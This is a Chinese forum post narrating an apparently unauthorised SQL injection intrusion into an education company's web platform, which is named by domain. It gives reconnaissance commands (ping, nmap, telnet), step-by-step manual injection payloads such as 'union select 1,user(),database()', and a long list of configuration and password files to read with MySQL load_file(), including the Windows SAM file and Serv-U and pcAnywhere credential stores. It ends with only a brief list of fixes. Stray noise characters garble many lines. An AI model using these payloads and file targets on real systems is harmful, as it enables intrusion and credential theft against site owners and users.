找回密码
 立即注册
查看: 2488|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
. l1 K$ `: `2 Z一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……/ ~# b/ m9 V% k+ X( a
第一步:获取需要的信息
" v% b" R9 r) C# N. F: ?6 }; {由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。* E% c* l" [& I% l: P; E
注:以下为保护特用XXX代替敏感信息$ k/ m( k1 ~# H- J: w
顺手先PING了一下他们的域名:
/ Q  z  C5 S4 {& ^/ i, ~ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
3 s% @; F* U9 f  k3 u$ h64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
% w- t, x' d4 U& _5 B/ u5 x/ M& f顺便了解一下TTL,学好基础知识才能一路顺风:6 M$ [/ _! `! y! Q) _
TTL:(Time To Live ) 生存时间
. Z/ U, T# n2 _0 L; E指定数据包被路由器丢弃之前允许通过的网段数量。
7 [- V% ~2 l5 ~6 |! s+ B1 k' BTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
' D  J6 V# c. g2 }" x6 `使用PING时涉及到的 ICMP 报文类型
: |9 y6 I4 Q; A6 c; O, `4 G一个为ICMP请求回显(ICMP Echo Request). k/ K3 ?! @3 s: X% o2 v
一个为ICMP回显应答(ICMP Echo Reply)1 f: O( E( o5 E9 o* }9 ?
TTL 字段值可以帮助我们识别操作系统类型。8 P6 V  L4 |! h$ @( a, I! j
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
9 U( N+ [  ]. p0 GCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
. }: P; B* p  \5 S微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
( N! Z- Y* b4 W( `. }微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 329 |  k: T0 ?9 C9 c! X( z/ `3 r( L9 r
当然,返回的TTL值是相同的
5 t" i( h( `' P! s! _% j但有些情况下有所特殊& u. m0 n1 h. y& T6 ^$ S
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64! y" w" y+ o$ g
FreeBSD 4.1, 4.0, 3.4;2 C, c% {, B- P
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
' c  R3 d) G. e& k  ]OpenBSD 2.6, 2.7,  q7 g  L) s7 K. r
NetBSD+ x9 O2 J* e% d, s: u! X) ]
HP UX 10.206 N( a% k7 F, y; A
ICMP 回显应答的 TTL 字段值为 255
! V8 `; u6 J. gWindows 95/98/98SE' p- S) X0 m. R0 ]3 \; z
Windows ME7 f1 |  K: b! Y) `! O
ICMP 回显应答的 TTL 字段值为 328 l7 m: o; |3 K8 {; E$ I+ X
Windows NT4 WRKS0 {0 Y( P/ L  e, _- M0 Q3 a
Windows NT4 Server
- D' F& y; U: N3 D8 T$ JWindows 2000
- r% j+ g' {; [  q: y. e4 k$ FWindows XP
; v1 P" T( R4 m! X3 f" g$ ^ICMP 回显应答的 TTL 字段值为 1280 e; w# a& X+ g  X% @
这样,我们就可以通过这种方法来辨别操作系统
0 p7 ~0 T0 F1 `# DTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
5 k+ ]3 a7 }8 b% @3 E用NMAP扫描一下:5 k7 `( l: W0 m5 ?
nmap -sT -O XXX.XXX.XXX.XXX8 n, x, R) n/ }: Q1 G# o' {
如果没有装WinPcap则会弹出提示:3 c% J. n+ q6 Q' A' ~1 N
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
9 `# h. D" C0 Q/ |+ n  Q5 I! i9 _ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
% B( F" R: \- q2 R3 h8 K6 t' l) mode — Nmap may not function completely
0 s9 S" c7 T5 NTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher+ h1 }7 Q. S1 L. n' c( t
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win3 }( z; i% Y: `' v5 @5 S" n
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an& Y) X! W: z; A0 r
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
9 h# A7 H( v! Y: a! hersions, you may be able to take iphlpapi.dll from another system and place it i0 l6 g* q5 a6 C( H9 v& |) C
n your system32 dir (e.g. c:\windows\system32).2 w, U3 H; O4 K* P* J. |$ p  U& ^
QUITTING!# \; q: A( X+ _) ?6 M. B2 O
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
/ J, Y; b8 l8 q* ~7 ~) ?安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:5 A& _+ l# f& Z& j3 G/ d
Interesting ports on XXX.XXX.XXX.XXX:( b, R* z0 ]) E' `8 y  E1 u# N
Not shown: 986 closed ports
' @6 T" J; x* ]! {- D: MPORT     STATE    SERVICE
  e) r5 a/ z3 j; }/ U21/tcp   open     ftp
' ^. ?: S) Y& ]% g/ \6 }1 u: g22/tcp   open     ssh% \6 y" I* ?/ N9 O2 M5 w( J" M& Z
23/tcp   open     telnet
+ t7 z9 ]7 i! Z5 y9 Y7 I0 s+ Q1 [80/tcp   open     http. q4 d2 g$ X5 L2 u
111/tcp  open     rpcbind* G' v( m( V9 h! t. n) i5 @8 {
135/tcp  filtered msrpc( H8 B9 S. X! s6 V2 ^0 B% U
139/tcp  filtered netbios-ssn
, V6 L* q6 i# o5 {2 D# g; h445/tcp  filtered microsoft-ds# a3 k- ~. p* [& t
513/tcp  open     login# M' s) O' _* P/ g# V$ K
514/tcp  open     shell% f, a, |( N& ~+ E; _# }
593/tcp  filtered http-rpc-epmap# P* D* Z* \& R5 l7 Z* _! R
1720/tcp filtered H.323/Q.9319 S' j! U+ ?5 z3 e8 ?8 C2 e
3306/tcp open     mysql
0 r- n( O+ W. x8 m4444/tcp filtered krb5244 p0 T- C0 L. e
Device type: WAP
. A$ `: g0 ^; T% W3 uRunning: Linux 2.4.X
% h) O- e* O$ I6 `" l* z4 t& kOS details: DD-WRT (Linux 2.4.35s); j7 M. t  r1 o' a0 T: {
Network Distance: 13 hops
1 n" O, Q+ c5 L看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
  E; x& q4 V5 klogin as:
" F8 o$ U# q0 v, aTelnet23端口也是开着的,用telnet 命令链接一下:
, ^: Z" W& h) R$ ctelnet XXX.XXX.XXX.XXX; y( ?, [% {9 q# e
提示:# Y1 G+ U7 W- @' p8 q, R
Red Hat Enterprise Linux Server release 5.2 (Tikanga)  P6 i) x, Q2 M6 y8 W% b& B. ?
Kernel 2.6.18-92.el5PAE on an i686
! R* O- s1 h& M2 A/ Dlogin:
/ f; X# _. j0 L% t获取HTTP头信息:7 {' U# E7 j1 T9 W
在本地执行如下PHP代码
3 |" E7 q. g' P7 M, x8 u; }/ X<?php7 u5 @. A4 A# [- X7 M1 B
$url = ‘XXX.XXX.XXX.XXX’;1 s. i: b7 a0 D) y7 J) o5 X
print_r(get_headers($url));
: `" D+ o0 B$ s6 e0 u# wprint_r(get_headers($url, 1));
* w( e! j6 h1 t+ R3 E?>
: D/ M- r' ~' g" T将以上代码保存为PHP文件,执行:4 {2 r. d. u  N
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
% O* v% s7 @! n2 A( C现在可以得出结论:4 Z7 T! V# G% D. L$ p& Y3 |( {
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
  n& X: e* D- e4 v& T9 z内核版本:Kernel 2.6.18-92.el5PAE on an i6864 |3 C5 L- W# Z, B; x5 H8 u
WEB服务器版本:nginx/0.7.61! w' e2 {9 c% o" g) c: L0 z" k
第二步,开始测试寻找漏洞. ]7 n5 z* |8 ?' F, o! T
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
. r3 Z1 u8 R* R  U1 E1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
; D8 W; P: n1 w# W3 k2、测试方法:在地址后加 and 1=1 和 and 1=2 测试2 V0 y# b- v. p0 t, z5 ~/ |
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
/ Y/ y) d. X) g0 B3 X" Hhttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
( W  _/ ~7 R9 q7 ~恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续. b9 q4 I) @! _8 H/ D: l
3、手工注入:
/ {2 m. x6 }+ Q$ c4 J注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。( N5 u/ z7 w" j* U$ ^% V$ D
3.1 猜测当前表字段数
% ?" a- S+ A2 ?. p  w! Fhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
; v. N$ n* c$ G. A3 [9 ?- x此处猜测有个简单的算法,都是有技巧的吗,呵呵4 `. c! x" h: _
算法简单如下:
" a8 C. l# R" ]3 S4 s5 f第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
/ T' Q8 z& X/ Y0 g第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
/ ^9 u( o9 s* u5 @9 P& |# {6 W需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
+ d( K8 y1 {5 {& H/ U1 S0 ^1 _以此来判断,是否过界,配合取中算法猜出字段数。
6 G" O6 Z, }3 a+ k5 E/ y% o举例:( u, |! N" z9 f$ [" z% K& E
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
, b  I8 \( [( t3 d" f, bhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
7 w% q' k( t+ L4 m; W% q此时3则为我们要找的字段数。4 z2 p$ F. @. ~$ P  l
3.2 配合union联合查询字段在页面所位置
2 I) r! }2 U- r* J+ e! D& z我们已经知道了字段数为3,此时则可以做如下操作:
: p: N* `; ?* u0 w* a+ ~http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
4 [. ^3 _: c7 t. r; M
" b. s" i; X* W* b" T. W/ x这样就可以测试到哪些字段在页面上有所显示了,如图:: ~0 ?( F% ]# P$ m. {- w

$ S1 ^* @8 ^5 T+ u" F, n3.3 查敏感信息4 j" s' [; e  ]% F( E; S- K2 u+ t
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
3 o: G1 i$ r1 l( V% @7 d  Chttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()+ N; l6 R5 V- \$ d  o( v. e
3.3.1 先查数据库用户、数据库名,以备后用,如图:. o7 S. a5 y+ L
! r9 Y! d1 ?+ L0 `9 m
得到数据库用户为root、数据库名为DBxx;# _( @1 @3 h* s+ Z" K
3.3.2 查配置文件0 W1 k& w6 j3 z3 y$ q* R
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。1 `; w% c! i% R% H/ o
查看文件有一定的条件限制:
4 E  O: M4 |* d4 n# V6 _2 q. N欲读取文件必须在服务器上
1 ^2 O) K& }* c* t! Q/ V必须指定文件完整的路径
9 @+ O- y3 ?* L必须有权限读取并且文件必须完全可读+ n- G9 O" u8 r2 ^; T: w3 O
欲读取文件必须小于 max_allowed_packet
% W& V: I$ d# P3 K9 z6 @5 l, r' KMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。# G" s3 D: `% {
常用的一些:
0 g: B) |9 |& U" X) d7 K- o/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
8 c% Y$ H6 v9 L5 a, ~8 y/usr/local/apache2/conf/httpd.conf
" Y: g, w1 f: d- F& Q0 `& X8 F/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置1 z/ j8 e) g' P
/usr/local/app/php5/lib/php.ini //PHP相关设置
4 h& O. y' E8 O' T/etc/sysconfig/iptables //从中得到防火墙规则策略
; |. @& B, m; z' X) K/ S/etc/httpd/conf/httpd.conf // apache配置文件
) G- p3 ~2 @% C9 }" I+ F/etc/rsyncd.conf //同步程序配置文件
0 G6 }: X% ?5 D% |' ^3 P/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
5 [! S* g: J$ b3 j+ a' F/ N2 T0 z/etc/my.cnf //mysql的配置文件: J; X. M4 w$ q4 A1 G
/etc/redhat-release //系统版本  o8 D3 @# d' C1 B
/etc/issue& v4 C3 w: g# `
/etc/issue.net- s9 \4 u5 }( d5 A" ]
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码5 i: c% u9 z5 \. d
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码8 d% W: Z1 G7 b" x& @
c:\Program Files\Serv-U\ServUDaemon.ini  B# }7 ]8 q  I$ g
c:\windows\my.ini //MYSQL配置文件
6 \) Z4 I* F! B6 oc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
* A+ Q$ C" g5 i4 o3 d! C: u. H等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,. [, Q# l, ]8 o/ \
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
6 c% S. f# V  m: ^4 ^c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此+ ~" X. d0 _# Q! c
c:\Program Files\RhinoSoft.com\ServUDaemon.exe# V" [0 T& E. t3 `9 Z$ |
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
# K6 Z- h* [) g( P6 C% u: y//存储了pcAnywhere的登陆密码4 a6 U5 `3 r5 I8 G6 y% h
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
5 N$ N5 h" Y5 L$ a3 G6 _. M这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
3 ?* T( X% }, n; o最后:防范措施
3 F& h8 s: ?  D) X& B# W2 y1、修复PHP注入漏洞;
* @9 u/ W! B/ D* L$ h! i: x5 v9 d2、Mysql使用普通权限的用户;
$ W8 I& u+ {9 w6 W3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表